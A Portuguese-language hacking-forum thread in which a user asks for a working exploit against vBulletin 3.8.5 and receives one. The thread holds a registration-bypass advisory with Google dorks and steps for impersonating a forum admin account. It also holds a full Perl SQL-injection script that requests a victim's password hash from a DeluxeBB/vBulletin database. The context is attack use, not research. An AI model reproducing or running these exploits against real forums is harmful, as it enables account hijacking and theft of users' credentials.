Tweet
Olá pessoal sou novo no fórum, e gostaria de saber se alguem tem algum exploit funcional para o forum vbulletin v.3.8.5.
Obrigado.
Obrigado.
-
-
Opa, testa ai:
================================================== =============
vBulletin 3.8.4 & 3.8.5 Registration Bypass Vulnerability
================================================== =============
01010101010101010101010101010101010101010101010101 0101010
0 0
1 Iranian Datacoders Security Team 2010 1
0 0
01010101010101010101010101010101010101010101010101 0101010
# Exploit Title: vBulletin 3.8.4 & 3.8.5 Around Registration Vulnerability
# Date: 29/08/2010
# Author: Immortal Boy
# Software Link: Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
# Version: 3.8.4 & 3.8.5
# Google dork 1 : powered by vBulletin 3.8.4
# Google dork 2 : powered by vBulletin 3.8.5
# Platform / Tested on: Multiple
# Category: webapplications
# Code : N/A
# BUG : ################################################## #######################
1 > Go to Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
2 > Assume that forum admin user name is ADMIN
3 > Type this at User Name ===> ADMIN�
4 > � is an ASCII Code
5 > And complete the other parameters
6 > Then click on Complete Registrarion
7 > Now you see that your user name like admin user name
After this time the private messages to the user (ADMIN) to sending see for you is sending .
# Patch : ################################################## #####################
1 > Go to AdminCP
2 > Click on vBulletin Options and choose vBulletin Options
3 > Choose Censorship Options
4 > type &# in Censored Words section
5 > Then click on Save
################################################## ###########################
Our Website : Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
Special Thanks to : H-SK33PY , NEO , Sp|R|T , BigB4NG , 3r1ck , Dr.mute ,
hosinn , NIK , uones , mohammad_ir & all iranian datacoders members
################################################## ########################### -
ok, kra eu eu fiz tudo certin so nao entendi a parte do admincp, nao consigo de jeito nenhum, vc poderia me ajudar?
"After this time the private messages to the user (ADMIN) to sending see for you is sending .
# Patch : ################################################## #####################
1 > Go to AdminCP
2 > Click on vBulletin Options and choose vBulletin Options
3 > Choose Censorship Options
4 > type &# in Censored Words section
5 > Then click on Save"
essa parte ai em diante nao consigo, to ligado q admincp é o painel de controle, mas nao entendi como acessa ele apartir da conta e talz...
Eu achei um outro exploit
so que nao entendi qual sua funçao real, consegui rodar ele aparece o seguinte#!/usr/bin/perl
use IO::Socket;
print q{
################################################## ####
# DeluxeBB Remote SQL Injection Exploit #
# vbulletin Remote SQL Injection Exploit #
# // SekoMirza // Turkish Hackerz #
################################################## ####
};
if (!$ARGV[2]) {
print q{
Usage: perl dbbxpl.pl host /directory/ victim_userid
perl dbbxpl.pl Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... /forum/ 1
};
}
$server = $ARGV[0];
$dir = $ARGV[1];
$user = $ARGV[2];
$myuser = $ARGV[3];
$mypass = $ARGV[4];
$myid = $ARGV[5];
print "------------------------------------------------------------------------------------------------\r\n";
print "[>] SERVER: $server\r\n";
print "[>] DIR: $dir\r\n";
print "[>] USERID: $user\r\n";
print "------------------------------------------------------------------------------------------------\r\n\r\n";
$server =~ s/(http:\/\/)//eg;
$path = $dir;
$path .=
"misc.php?sub=profile&name=0')+UNION+SELECT+0,pass ,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 ,0+FROM%20deluxebb_users%
20WHERE%20(uid='".$user ;
print "[~] PREPARE TO CONNECT...\r\n";
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80") || die "[-] CONNECTION FAILED";
print "[+] CONNECTED\r\n";
print "[~] SENDING QUERY...\r\n";
print $socket "GET $path HTTP/1.1\r\n";
print $socket "Host: $server\r\n";
print $socket "Accept: */*\r\n";
print $socket "Connection: close\r\n\r\n";
print "[+] DONE!\r\n\r\n";
print "--[ REPORT ]------------------------------------------------------------------------------------\r\n";
while ($answer = <$socket>)
{
if ($answer =~/(\w{32})/)
{
if ($1 ne 0) {
print "Password Hash is: ".$1."\r\n";
print "--------------------------------------------------------------------------------------\r\n";
}
exit();
}
}
print "------------------------------------------------------------------------------------------------\r\n";
################################################## #######
#Shoutz: #
# #
# My Sweet -> Caramel #
# For Mp3s -> Hypn0sis #
# For Support -> [Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... #
# My Bro -> PhantomOrchid #
# My Preceptor -> Earnk Kazno #
################################################## #######
grato desde jáComment
Comment